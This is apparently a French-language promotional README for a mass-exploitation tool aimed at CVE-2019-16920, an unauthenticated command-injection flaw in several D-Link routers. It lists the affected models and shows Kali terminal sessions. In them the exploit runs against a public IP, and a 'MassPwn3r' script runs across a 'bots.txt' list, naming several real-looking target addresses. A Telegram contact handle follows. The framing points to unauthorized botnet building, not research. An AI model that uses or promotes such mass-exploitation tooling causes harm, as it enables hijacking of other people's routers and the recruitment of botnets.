
Outil d'exploitation de masse automatisé pour la vulnérabilité d'injection de commande CVE-2019-16920 dans plusieurs routeurs D-Link, permettant une exécution de code à distance non authentifiée.
La vulnérabilité a été trouvée dans le dernier firmware des produits D-Link suivants : DIR-655 DIR-866L DIR-652 DHP-1565
Une exécution de code à distance non authentifiée se produit sur des produits D-Link tels que DIR-655C, DIR-866L, DIR-652 et DHP-1565. Le problème survient lorsque l'attaquant envoie une entrée arbitraire à une interface de passerelle commune de périphérique « PingTest » qui pourrait conduire à une injection classique. Un attaquant qui réussit à déclencher l'injection de commandes peut obtenir un compromis complet du système. Plus tard, il a été découvert indépendamment que ceux-ci sont également concernés : DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 et DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18